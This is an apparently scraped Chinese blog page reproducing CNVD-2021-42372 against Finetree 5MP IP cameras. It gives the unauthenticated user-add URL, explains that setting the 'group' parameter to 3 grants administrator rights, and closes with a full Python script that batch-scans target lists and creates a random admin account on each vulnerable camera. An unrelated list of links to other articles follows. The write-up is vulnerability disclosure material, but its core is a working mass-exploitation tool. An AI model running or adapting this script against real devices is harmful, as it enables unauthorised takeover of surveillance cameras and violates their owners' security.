渗透测试小白
渗透测试小白

实战 - Finetree 5MP 摄像机任意用户添加漏洞(CNVD-2021-42372)

文章目录

  • Finetree 5MP 摄像机任意用户添加漏洞
    • 漏洞复现
  • Finetree 5MP 未授权权限提升漏洞
    • 漏洞复现
  • 批量测试POC

EXP:http://ip:port/quicksetup/user_pop.php?method=add

Finetree 5MP 摄像机任意用户添加漏洞

漏洞复现

登录界面

实战 - Finetree 5MP 摄像机任意用户添加漏洞(CNVD-2021-42372)_第1张图片

使用exp,访问未授权的用户添加页面,进行任意用户添加操作,添加会出现报错不用管,直接返回后台登录即可

http://ip:port/quicksetup/user_pop.php?method=add

实战 - Finetree 5MP 摄像机任意用户添加漏洞(CNVD-2021-42372)_第2张图片

实战 - Finetree 5MP 摄像机任意用户添加漏洞(CNVD-2021-42372)_第3张图片

Finetree 5MP 未授权权限提升漏洞

漏洞复现

使用exp添加用户并抓包,修改 ‘group=’ 参数值,放行请求包即可完成低用户提升为管理员用户

group是组,1代表guest,2是operator,3是administrator

实战 - Finetree 5MP 摄像机任意用户添加漏洞(CNVD-2021-42372)_第4张图片

批量测试POC

#!/usr/bin/env python

# -*- conding:utf-8 -*-

# Finetree 5MP 摄像机任意用户添加


import requests

import argparse

import sys

import urllib3

import random

import threading

urllib3.disable_warnings()

  
  

def title():

    print("""

  _____  _   _ __      __ _____           ___    ___   ___   __          _  _    ___   ____   ______  ___  

 / ____|| \ | |\ \    / /|  __ \         |__ \  / _ \ |__ \ /_ |        | || |  |__ \ |___ \ |____  ||__ \

| |     |  \| | \ \  / / | |  | | ______    ) || | | |   ) | | | ______ | || |_    ) |  __) |    / /    ) |

| |     | . ` |  \ \/ /  | |  | ||______|  / / | | | |  / /  | ||______||__   _|  / /  |__ <    / /    / /

| |____ | |\  |   \  /   | |__| |         / /_ | |_| | / /_  | |           | |   / /_  ___) |  / /    / /_

 \_____||_| \_|    \/    |_____/         |____| \___/ |____| |_|           |_|  |____||____/  /_/    |____|

  

                                                                                        Author:Henry4E36

               """)

  
  

class information(object):

    def __init__(self,args):

        self.args = args

        self.url = args.url

        self.file = args.file

  

    def target_url(self):

        payload = self.url + "/quicksetup/user_update.php"

        headers = {

            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",

            "Content-Type": "application/x-www-form-urlencoded"

        }

  

        username = ''.join(random.sample("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",8))

        passwd = ''.join(random.sample("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_.1234567890!@#",8))

        data = f"method=add&user={username}&pwd={passwd}&group=3&ptz_enable=0" # 1.访客 2.操作者 3.管理员

        try:

            res = requests.post(url=payload, headers=headers, data=data, verify=False, timeout=5)

            if res.status_code == 200 and "200" in res.text:

                print(f"\033[31m[{chr(8730)}] 目标系统: {self.url} 存在任意用户添加!\033[0m")

                print(f"\033[31m[{chr(8730)}] 用户名: {username} 密码: {passwd} \033[0m")

                print("[" + "-"*100 + "]")

            elif res.status_code == 200 and "804" in res.text:

                print(f"[\033[31mx\033[0m] 目标系统: {self.url} 用户重复!")

                print("[" + "-"*100 + "]")

            elif res.status_code == 200 and "802" in res.text:

                print(f"[\033[31mx\033[0m] 目标系统: {self.url} 用户满了!")

                print("[" + "-"*100 + "]")

            else:

                print(f"[\033[31mx\033[0m]  目标系统: {self.url} 不存在任意用户添加!")

                print("[" + "-"*100 + "]")

        except Exception as e:

            print("[\033[31mX\033[0m]  连接错误!")

            print("[" + "-"*100 + "]")

  
  

    def file_url(self):

        with open(self.file, "r") as urls:

            for url in urls:

                url = url.strip()

                if url[:4] != "http":

                    url = "http://" + url

                self.url = url.strip()

                information.target_url(self)

  
  

if __name__ == "__main__":

    title()

    parser = argparse.ArgumentParser(description='Finetree 5MP 摄像机任意用户添加')

    parser.add_argument("-u", "--url", type=str, metavar="url", help="Target url eg:\"http://127.0.0.1\"")

    parser.add_argument("-f", "--file", metavar="file", help="Targets in file  eg:\"ip.txt\"")

    args = parser.parse_args()

    if len(sys.argv) != 3:

        print(

            "[-]  参数错误!\neg1:>>>python3 CNVD-2021-42372.py -u http://127.0.0.1 \neg2:>>>python3 CNVD-2021-42372 -f ip.txt")

    elif args.url:

        information(args).target_url()

    elif args.file:

        information(args).file_url()

你可能感兴趣的:(python,渗透测试,web安全,安全,网络安全)

  • 自动化办公|xlwings 数据类型和转换 游客520 自动化实用代码python全栈学习自动化运维python
    xlwings数据类型和转换:Python与Excel的桥梁在使用xlwings进行Python和Excel数据交互时,理解两者之间的数据类型对应关系至关重要。本篇将详细介绍Python数据类型与Excel数据类型的对应关系,以及如何进行数据类型转换。一、Python数据类型与Excel数据类型的对应关系Python数据类型Excel数据类型说明int数字整数float数字浮点数str文本字符串b
  • 【网络安全】Snort中文查询手册 Walter_Jia NetworkSecurity
    Snort中文手册摘要snort有三种工作模式:嗅探器、数据包记录器、网络入侵检测系统。嗅探器模式仅仅是从网络上读取数据包并作为连续不断的流显示在终端上。数据包记录器模式把数据包记录到硬盘上。网路入侵检测模式是最复杂的,而且是可配置的。我们可以让snort分析网络数据流以匹配用户定义的一些规则,并根据检测结果采取一定的动作。(2003-12-1116:39:12)Snort用户手册第一章snort
  • python如何解压缩文件或文件夹 游客520 实用代码python全栈学习python
    在日常开发或数据处理工作中,我们经常需要对文件或文件夹进行压缩和解压缩操作。Python提供了强大的内置模块,如zipfile和shutil,可以帮助我们高效地完成这些任务。本文将介绍如何使用Python对文件夹或文件进行压缩和解压缩,内容包括两种常见方式:zipfile和shutil,并提供完整代码示例。压缩文件或文件夹1.使用zipfile模块压缩文件夹zipfile模块是Python标准库的
  • Python 爬虫验证码识别 acheding pythonpython爬虫ocr
    在我们进行爬虫的过程中,经常会碰到有些网站会时不时弹出来验证码识别。我们该如何解决呢?这里分享2种我尝试过的方法。0.验证码示例1.OpenCV+pytesseract使用Python中的OpenCV库进行图像预处理(边缘保留滤波、灰度化、二值化、形态学操作和逻辑运算),然后结合pytesseract进行文字识别。pytesseract需要配合安装在本地的tesseract-ocr.exe文件一起
  • 【Python实用技巧】爬取数据保存到Excel中 「已注销」 pythonpython爬虫开发语言
    嗨嗨,大家好~今天来给你们分享一个小技巧如何用python爬取数据保存到Excel中话不多说,马上开始需要源码、教程,或者是自己有关python不懂的问题,都可以来这里哦https://jq.qq.com/?_wv=1027&k=s5bZE0K3这里还有学习资料与免费课程领取开发工具Python版本:3.6相关模块:importrequestsfromlxmlimportetreeimportti
  • Python爬取小说保存为Excel 不知所云975 python
    本代码以实际案例介绍,爬取‘笔趣阁最新小说‘列表保存为表格文件。类封装以及网络爬虫以及openpyxl模块可以参考学习。#更新小说目录importrequestsfromlxmlimportetreeimportopenpyxlfromopenpyxl.stylesimportFont,Alignment,Side,Border,PatternFill#定义下载表格的类classDown_exce
  • python 爬取图片并保存到excel_python制作爬虫并将抓取结果保存到excel中 weixin_39778582 python爬取图片并保存到excel
    学习Python也有一段时间了,各种理论知识大体上也算略知一二了,今天就进入实战演练:通过Python来编写一个拉勾网薪资调查的小爬虫。第一步:分析网站的请求过程我们在查看拉勾网上的招聘信息的时候,搜索Python,或者是PHP等等的岗位信息,其实是向服务器发出相应请求,由服务器动态的响应请求,将我们所需要的内容通过浏览器解析,呈现在我们的面前。可以看到我们发出的请求当中,FormData中的kd
  • node js怎么进行打包发布linux,Node.js JXcore 打包 weixin_39851457 nodejs怎么进行打包发布linux
    Node.jsJXcore打包Node.js是一个开放源代码、跨平台的、用于服务器端和网络应用的运行环境。JXcore是一个支持多线程的Node.js发行版本,基本不需要对你现有的代码做任何改动就可以直接线程安全地以多线程运行。这篇文章主要是要向大家介绍JXcore的打包功能。JXcore安装下载JXcore安装包,并解压,在解压的的目录下提供了jx二进制文件命令,接下来我们主要使用这个命令。步骤
  • python爬取的数据保存到表格中_利用Python爬取的数据存入Excel表格 weixin_39608063
    分析要爬取的内容的网页结构:demo.py:importrequests#requests是HTTP库importrefromopenpyxlimportworkbook#写入Excel表所用fromopenpyxlimportload_workbook#读取Excel表所用frombs4importBeautifulSoupasbs#bs:通过解析文档为用户提供需要抓取的数据importosim
  • python爬取天眼查存入excel表格_python爬取企查查江苏企业信息生成excel表格 吴寿鹤
    1.前期准备具体请查看上一篇2.准备库requests,BeautifulSoup,xlwt,lxml1.BeautifulSoup:是专业的网页爬取库,方便抓取网页信息2.xlwt:生成excel表格3.lxml:xml解析库3.具体思路企查查网站具有一定的反爬机制,直接爬取会受到网站阻拦,所以我们需要模拟浏览器请求,绕过反爬机制,打开企查查网站,获取cookie及一系列请求头文件,然后使用Be
  • 工业物联网远程监控系统优化方案,基于巨控GRM553Y-CHE 何工13763355074 物联网巨控GRM553Y-C巨控GRM552Y-C
    工业物联网远程监控系统优化方案——基于巨控GRM553Y-CHE的西门子S7-1500PLC多站点无线集成方案1.项目背景与概述巨控科技作为工业物联网解决方案提供商,专注于PLC无线通信与远程监控技术研发,其YunPLC安全平台已服务超30,000+工业终端,覆盖智能制造、智慧能源、环保监测等20余个行业,累计稳定运行超10亿小时。平台通过信息安全管理体系认证及工业网络安全认证,确保数据全程加密与
  • 6.1 理解API的概念 programmer120986 apijava平台class虚拟机网络应用
    JavaAPI通过支持平台无关性和安全性,使得Java适应于网络应用。JavaAPI是运行库的集合,它提供了一套访问主机系统资源的标准方法。运行Java程序时,虚拟机装载程序的class文件所使用的JavaAPIclass文件。所有被装载的class文件(包括从应用程序中和从JavaAPI中提取的)和所有已经装载的动态库(包含本地方法)共同组成了再Java虚拟机上运行的整个程序。在一个平台能够支持
  • 学会Python3模拟登录并爬取表格数据!excel高手也自叹不如! m0_60635321 2024年程序员学习excelpython爬虫
    先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年最新Python全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课
  • 使用 Python 将爬取的内容保存到 Excel 表格 木觞清 pythonexcel开发语言
    在数据爬取的过程中,很多时候我们需要将爬取到的内容保存到Excel表格中,以便进一步处理、分析和可视化。Python提供了强大的库来实现这一功能,常用的有requests、BeautifulSoup用于网页内容的爬取,以及pandas、openpyxl用于将数据保存到Excel文件。本文将带你一步步完成从爬取数据到保存到Excel文件的整个过程。1.安装必要的库首先,你需要安装一些Python库。
  • Python学习心得字符串的去重操作 lifegoesonwjl python开发语言pycharm
    一个字符串中可能包含许多相同的元素,为了保证字符串中的唯一性,下面介绍的是字符串的去重操作:第一种方式:利用for+if的结构进行去重这个程序是对字符串中的每个元素进行判断,如果不在新建的空字符串中就把该元素添加进来,否则就直接忽略过去。s='helloworldhelloworldhelloworld'new_s=''foritemins:ifitemnotinnew_s:new_s+=item
  • 使用Python实现深度学习模型:知识蒸馏与模型压缩 Echo_Wish Python笔记从零开始学Python人工智能Python算法python深度学习开发语言
    在深度学习领域,模型的大小和计算复杂度常常是一个挑战。知识蒸馏(KnowledgeDistillation)和模型压缩(ModelCompression)是两种有效的技术,可以在保持模型性能的同时减少模型的大小和计算需求。本文将详细介绍如何使用Python实现这两种技术。目录引言知识蒸馏概述模型压缩概述实现步骤数据准备教师模型训练学生模型训练(知识蒸馏)模型压缩代码实现结论1.引言在实际应用中,深
  • 来看看爬虫合不合法 度假的小鱼 Python基础爬虫搜索引擎python
    活动地址:CSDN21天学习挑战赛文章目录一、爬虫合不合法二、什么是爬虫三、爬虫的分类四、为什么学网络爬虫一、爬虫合不合法随着Python在最近几年的流行,Python中的爬虫也逐渐进入到大家的视野中,但是很多小伙伴,还是在担心爬虫的合法性。今天就来和大家一起讨论一下爬虫的合法性。大家可能在网上看到很多有关程序员写爬虫被抓这样的新闻只因写了一段爬虫,公司200多人被抓!爬虫的本身是合法的,但是如何
  • Linux上Scapy完全指南:从入门到实战攻防 和舒貌 linux信息与通信网络安全安全
    Linux上Scapy完全指南:从入门到实战攻防目录Scapy简介与核心优势Linux环境安装与配置Scapy基础操作高级功能与协议分析实战案例:网络诊断与安全审计性能优化与调试技巧常见问题解答一、Scapy简介与核心优势1.1什么是Scapy?Scapy是一款基于Python的交互式数据包操作工具,能够构造、发送、捕获和分析网络协议数据包。其核心特点包括:支持超过800种协议(如TCP/IP、H
  • 《爬虫写得好,铁窗关到老,做了5年Python code高级开源 2024年程序员学习爬虫python开发语言
    **我的使命与愿景:**持续稳定输出,赋能中国技术社区蓬勃发展!最近的IT公司违法案件越来越多,看了很多因为爬虫,数字货币,博彩网站外包等被抓的事情,给大家提个醒,打工注意不能违法,写代码背后也有法律风险。一、什么是爬虫?通过爬虫代码,下载互联网上的数据到本地,并且提取出我们需要的信息的过程。二、典型违法案例典型案例(一):构成非法获取计算机信息系统数据罪张某等非法获取计算机信息系统数据案(上海市
  • Python面试题:解释一下什么是 Python 的 GIL(全局解释器锁) 杰哥在此 Python系列python开发语言
    Python的GIL(GlobalInterpreterLock,全局解释器锁)是CPython解释器中的一个机制,它限制了在任何给定的时刻只有一个线程能够执行Python字节码。这意味着,即使在多核处理器上,Python程序也不能通过多线程实现真正的并行执行。GIL的背景GIL是由CPython解释器实现的,它是为了简化内存管理而引入的。Python中的对象管理(特别是引用计数)不是线程安全的,
  • Day47(补)【软考】2022年下半年软考软件设计师综合知识真题-计算机软件知识2 一个一定要撑住的学习者 #软件设计师算法
    文章目录2022年下半年软考软件设计师综合知识真题第1章计算机系统基础知识(18/38)计算机软件知识2-6/6(其中一个做过)哲学概念及收敛思维:分母为0的故障哲学分类,考事务故障集合除数为零是否属于事务故障?哲学概念及收敛思维:Python3列表截取[max,min,-n]的哲学理解,输入-,考集合排列从大到小,range和list输入,考结束值min不在集合中哲学概念及收敛思维:**栈帧的核
  • python M3U8转换为MP4 会飞的鱼— python
    importosimportasyncioimportrandomimportshutilimportaiohttpimportffmpegfromconcurrent.futuresimportThreadPoolExecutor#M3U8文件的URL#m3u8_url='********************.m3u8'#临时存储TS文件的文件夹ts_folder='ts_files'os.
  • 多语言实现图像生成的API调用指南 IT·小灰灰 人工智能数据挖掘深度学习语言模型图像处理AI作画
    在现代软件开发中,API(应用程序编程接口)的使用变得越来越普遍。无论是JavaScript、Python、Go还是Java,开发者们都需要与各种API进行交互以实现特定的功能。本文将通过一个具体的例子,展示如何使用不同的编程语言调用一个图像生成的API,并生成一幅描述海岛的图像。目录API获取方式正文1.JavaScript实现2.Python实现3.Go实现4.Java实现结语API获取方式前
  • 土星云NAS企业网盘:AI引领的未来办公新纪元 土星云SaturnCloud 产品人工智能计算机外设图像处理机器学习
    网络存储服务器(NAS)是一种通过局域网提供文件级别数据存储的系统设备方案,不仅为个人家庭的影音娱乐所用,也可以作为企业的数据文件存储平台。但是传统NAS设备并非专为企业应用所设计,硬件可靠性不足,软件操作复杂更难言数据安全管理,如何在满足数据存储需求的基础上更进一步高效协同智慧办公成了待解的难题。土星云NAS企业网盘为企业用户带来了全新的最优答案,它是由北京国科环宇科技股份有限公司和杭州可道云网
  • Django ORM - 聚合查询 lsx202406 开发语言
    DjangoORM-聚合查询引言Django是一个强大的PythonWeb框架,它拥有一个功能丰富的对象关系映射(Object-RelationalMapping,简称ORM)。ORM允许开发者以Python类和对象的交互方式来操作数据库,而不是直接编写SQL查询。本文将深入探讨DjangoORM中的聚合查询功能,包括其基本用法、常用函数以及在实际开发中的应用场景。聚合查询简介聚合查询,顾名思义,
  • 解决方案之高效检测PDF文件中的XSS攻击问题
    引言随着互联网的普及和数字化办公的推进,PDF(PortableDocumentFormat)文件已成为信息交换的重要载体。然而,PDF文件的安全性问题也日益凸显,尤其是跨站脚本攻击(Cross-SiteScripting,XSS)的威胁。XSS攻击通过在PDF文件中嵌入恶意脚本,当用户打开文件时,脚本会在其浏览器中执行,可能导致敏感信息泄露、会话劫持等严重后果。因此,高效检测PDF文件中的XSS
  • 【kafka系列】生产者 漫步者TZ kafkakafka数据库大数据
    目录发送流程1.流程逻辑分析阶段一:主线程处理阶段二:Sender线程异步发送核心设计思想2.流程关键点总结重要参数一、核心必填参数二、可靠性相关参数三、性能优化参数四、高级配置五、安全性配置(可选)六、错误处理与监控典型配置示例关键注意事项发送流程序列化与分区:消息通过Partitioner选择目标分区(默认轮询或哈希),序列化后加入RecordAccumulator缓冲区。批次合并:Sende
  • 企业文件安全:防范内部人员数据泄露风险 够快云库 企业数据安全企业文件安全
    在企业文件安全管理中,外部黑客攻击常常受到广泛关注,然而,内部人员造成的数据泄露风险同样不容忽视。内部人员可能因疏忽、不满或被利益诱惑等原因,导致企业敏感文件数据泄露,给企业带来巨大损失。一、内部人员数据泄露的现状与原因当前,企业内部人员数据泄露事件时有发生。一方面,部分员工安全意识淡薄,随意将文件存储在不安全的设备上,或通过不加密的渠道传输文件,增加了数据泄露的风险。另一方面,一些员工因对企业的
  • 文件安全审计:追踪与监控数据访问行为的利器 够快云库 企业数据安全企业文件安全
    随着企业数据资产的不断增长,文件安全已成为企业面临的重大挑战之一。无论是外部威胁还是内部操作失误,都可能导致敏感数据的泄露、篡改甚至丢失。因此,企业不仅需要有效的安全防护措施,还应具备强大的追踪与监控能力,以确保任何对文件的访问和操作行为都在安全控制之下。在这种背景下,文件安全审计成为企业管理中至关重要的工具,它为企业提供了全面的文件操作记录,帮助及时发现并应对潜在的安全威胁。1.文件安全审计的核
  • 文件中台与安全:集成方案的探索与实践 够快云库 企业数据安全文件安全企业文件安全
    在企业数字化转型加速的今天,文件中台已成为支撑数据共享与高效协作的关键基础设施。然而,随着企业文件需求的增多和内容复杂性的提升,文件的安全问题也日益突显。如何在构建强大文件中台的同时,保障文件数据的安全性,已成为企业亟需解决的课题。文件中台的核心功能文件中台是企业管理和存储各类文件资源的中枢系统,旨在通过统一的管理方式实现文件的集中存储、权限控制、搜索与共享。它通过整合不同来源的文件数据,实现了文
  • 异常的核心类Throwable 无量 java源码异常处理exception
    java异常的核心是Throwable,其他的如Error和Exception都是继承的这个类 里面有个核心参数是detailMessage,记录异常信息,getMessage核心方法,获取这个参数的值,我们可以自己定义自己的异常类,去继承这个Exception就可以了,方法基本上,用父类的构造方法就OK,所以这么看异常是不是很easy package com.natsu;
  • mongoDB 游标(cursor) 实现分页 迭代 开窍的石头 mongodb
    上篇中我们讲了mongoDB 中的查询函数,现在我们讲mongo中如何做分页查询      如何声明一个游标        var mycursor = db.user.find({_id:{$lte:5}});       迭代显示游标数
  • MySQL数据库INNODB 表损坏修复处理过程 0624chenhong tomcatmysql
    最近mysql数据库经常死掉,用命令net stop mysql命令也无法停掉,关闭Tomcat的时候,出现Waiting for N instance(s) to be deallocated 信息。查了下,大概就是程序没有对数据库连接释放,导致Connection泄露了。因为用的是开元集成的平台,内部程序也不可能一下子给改掉的,就验证一下咯。启动Tomcat,用户登录系统,用netstat -
  • 剖析如何与设计人员沟通 不懂事的小屁孩 工作
    最近做图烦死了,不停的改图,改图……。烦,倒不是因为改,而是反反复复的改,人都会死。很多需求人员不知该如何与设计人员沟通,不明白如何使设计人员知道他所要的效果,结果只能是沟通变成了扯淡,改图变成了应付。 那应该如何与设计人员沟通呢? 我认为设计人员与需求人员先天就存在语言障碍。对一个合格的设计人员来说,整天玩的都是点、线、面、配色,哪种构图看起来协调;哪种配色看起来合理心里跟明镜似的,
  • qq空间刷评论工具 换个号韩国红果果 JavaScript
    var a=document.getElementsByClassName('textinput'); var b=[]; for(var m=0;m<a.length;m++){ if(a[m].getAttribute('placeholder')!=null) b.push(a[m]) } var l
  • S2SH整合之session 灵静志远 springAOPstrutssession
    错误信息: Caused by: org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'cartService': Scope 'session' is not active for the current thread; consider defining a scoped
  • xmp标签 a-john 标签
    今天在处理数据的显示上遇到一个问题: var html = '<li><div class="pl-nr"><span class="user-name">' + user + '</span>' + text + '</div></li>'; ulComme
  • Ajax的常用技巧(2)---实现Web页面中的级联菜单 aijuans Ajax
    在网络上显示数据,往往只显示数据中的一部分信息,如文章标题,产品名称等。如果浏览器要查看所有信息,只需点击相关链接即可。在web技术中,可以采用级联菜单完成上述操作。根据用户的选择,动态展开,并显示出对应选项子菜单的内容。 在传统的web实现方式中,一般是在页面初始化时动态获取到服务端数据库中对应的所有子菜单中的信息,放置到页面中对应的位置,然后再结合CSS层叠样式表动态控制对应子菜单的显示或者隐
  • 天-安-门,好高 atongyeye 情感
        我是85后,北漂一族,之前房租1100,因为租房合同到期,再续,房租就要涨150。最近网上新闻,地铁也要涨价。算了一下,涨价之后,每次坐地铁由原来2块变成6块。仅坐地铁费用,一个月就要涨200。内心苦痛。     晚上躺在床上一个人想了很久,很久。        我生在农
  • android 动画 百合不是茶 android透明度平移缩放旋转
    android的动画有两种  tween动画和Frame动画   tween动画;,透明度,缩放,旋转,平移效果   Animation   动画 AlphaAnimation 渐变透明度 RotateAnimation 画面旋转 ScaleAnimation 渐变尺寸缩放 TranslateAnimation 位置移动 Animation
  • 查看本机网络信息的cmd脚本 bijian1013 cmd
    @echo 您的用户名是:%USERDOMAIN%\%username%>"%userprofile%\网络参数.txt" @echo 您的机器名是:%COMPUTERNAME%>>"%userprofile%\网络参数.txt" @echo ___________________>>"%userprofile%\
  • plsql 清除登录过的用户 征客丶 plsql
    tools---preferences----logon history---history  把你想要删除的删除 -------------------------------------------------------------------- 若有其他凝问或文中有错误,请及时向我指出, 我好及时改正,同时也让我们一起进步。 email : binary_spac
  • 【Pig一】Pig入门 bit1129 pig
    Pig安装 1.下载pig   wget http://mirror.bit.edu.cn/apache/pig/pig-0.14.0/pig-0.14.0.tar.gz   2. 解压配置环境变量      如果Pig使用Map/Reduce模式,那么需要在环境变量中,配置HADOOP_HOME环境变量   expor
  • Java 线程同步几种方式 BlueSkator volatilesynchronizedThredLocalReenTranLockConcurrent
    为何要使用同步?      java允许多线程并发控制,当多个线程同时操作一个可共享的资源变量时(如数据的增删改查),      将会导致数据不准确,相互之间产生冲突,因此加入同步锁以避免在该线程没有完成操作之前,被其他线程的调用,      从而保证了该变量的唯一性和准确性。 1.同步方法&
  • StringUtils判断字符串是否为空的方法(转帖) BreakingBad nullStringUtils“”
    转帖地址:http://www.cnblogs.com/shangxiaofei/p/4313111.html   public static boolean isEmpty(String str)     判断某字符串是否为空,为空的标准是 str== null  或 str.length()== 0  
  • 编程之美-分层遍历二叉树 bylijinnan java数据结构算法编程之美
    import java.util.ArrayList; import java.util.LinkedList; import java.util.List; public class LevelTraverseBinaryTree { /** * 编程之美 分层遍历二叉树 * 之前已经用队列实现过二叉树的层次遍历,但这次要求输出换行,因此要
  • jquery取值和ajax提交复习记录 chengxuyuancsdn jquery取值ajax提交
    // 取值 // alert($("input[name='username']").val()); // alert($("input[name='password']").val()); // alert($("input[name='sex']:checked").val()); // alert($("
  • 推荐国产工作流引擎嵌入式公式语法解析器-IK Expression comsci java应用服务器工作Excel嵌入式
    这个开源软件包是国内的一位高手自行研制开发的,正如他所说的一样,我觉得它可以使一个工作流引擎上一个台阶。。。。。。欢迎大家使用,并提出意见和建议。。。 ----------转帖--------------------------------------------------- IK Expression是一个开源的(OpenSource),可扩展的(Extensible),基于java语言
  • 关于系统中使用多个PropertyPlaceholderConfigurer的配置及PropertyOverrideConfigurer daizj spring
    1、PropertyPlaceholderConfigurer Spring中PropertyPlaceholderConfigurer这个类,它是用来解析Java Properties属性文件值,并提供在spring配置期间替换使用属性值。接下来让我们逐渐的深入其配置。 基本的使用方法是:(1) <bean id="propertyConfigurerForWZ&q
  • 二叉树:二叉搜索树 dieslrae 二叉树
        所谓二叉树,就是一个节点最多只能有两个子节点,而二叉搜索树就是一个经典并简单的二叉树.规则是一个节点的左子节点一定比自己小,右子节点一定大于等于自己(当然也可以反过来).在树基本平衡的时候插入,搜索和删除速度都很快,时间复杂度为O(logN).但是,如果插入的是有序的数据,那效率就会变成O(N),在这个时候,树其实变成了一个链表. tree代码:
  • C语言字符串函数大全 dcj3sjt126com cfunction
    C语言字符串函数大全     函数名: stpcpy 功 能: 拷贝一个字符串到另一个 用 法: char *stpcpy(char *destin, char *source); 程序例:   #include <stdio.h> #include <string.h>   int main
  • 友盟统计页面技巧 dcj3sjt126com 技巧
    在基类调用就可以了, 基类ViewController示例代码 -(void)viewWillAppear:(BOOL)animated { [super viewWillAppear:animated]; [MobClick beginLogPageView:[NSString stringWithFormat:@"%@",self.class]];
  • window下在同一台机器上安装多个版本jdk,修改环境变量不生效问题处理办法 flyvszhb javajdk
    window下在同一台机器上安装多个版本jdk,修改环境变量不生效问题处理办法 本机已经安装了jdk1.7,而比较早期的项目需要依赖jdk1.6,于是同时在本机安装了jdk1.6和jdk1.7. 安装jdk1.6前,执行java -version得到 C:\Users\liuxiang2>java -version java version "1.7.0_21&quo
  • Java在创建子类对象的同时会不会创建父类对象 happyqing java创建子类对象父类对象
      1.在thingking in java 的第四版第六章中明确的说了,子类对象中封装了父类对象,   2."When you create an object of the derived class, it contains within it a subobject of the base class. This subobject is the sam
  • 跟我学spring3 目录贴及电子书下载 jinnianshilongnian spring
        一、《跟我学spring3》电子书下载地址: 《跟我学spring3》  (1-7 和 8-13) http://jinnianshilongnian.iteye.com/blog/pdf     跟我学spring3系列 word原版 下载     二、 源代码下载 最新依
  • 第12章 Ajax(上) onestopweb Ajax
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • BI and EIM 4.0 at a glance blueoxygen BO
    http://www.sap.com/corporate-en/press.epx?PressID=14787   有机会研究下EIM家族的两个新产品~~~~   New features of the 4.0 releases of BI and EIM solutions include: Real-time in-memory computing –
  • Java线程中yield与join方法的区别 tomcat_oracle java
    长期以来,多线程问题颇为受到面试官的青睐。虽然我个人认为我们当中很少有人能真正获得机会开发复杂的多线程应用(在过去的七年中,我得到了一个机会),但是理解多线程对增加你的信心很有用。之前,我讨论了一个wait()和sleep()方法区别的问题,这一次,我将会讨论join()和yield()方法的区别。坦白的说,实际上我并没有用过其中任何一个方法,所以,如果你感觉有不恰当的地方,请提出讨论。 &nb
  • android Manifest.xml选项 阿尔萨斯 Manifest
    结构 继承关系 public final class Manifest extends Objectjava.lang.Objectandroid.Manifest 内部类 class Manifest.permission权限 class Manifest.permission_group权限组 构造函数 public Manifest () 详细 androi
  • Oracle实现类split函数的方 zhaoshijie oracle
    关键字:Oracle实现类split函数的方 项目里需要保存结构数据,批量传到后他进行保存,为了减小数据量,子集拼装的格式,使用存储过程进行保存。保存的过程中需要对数据解析。但是oracle没有Java中split类似的函数。从网上找了一个,也补全了一下。 CREATE OR REPLACE TYPE t_split_100 IS TABLE OF VARCHAR2(100); cr
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他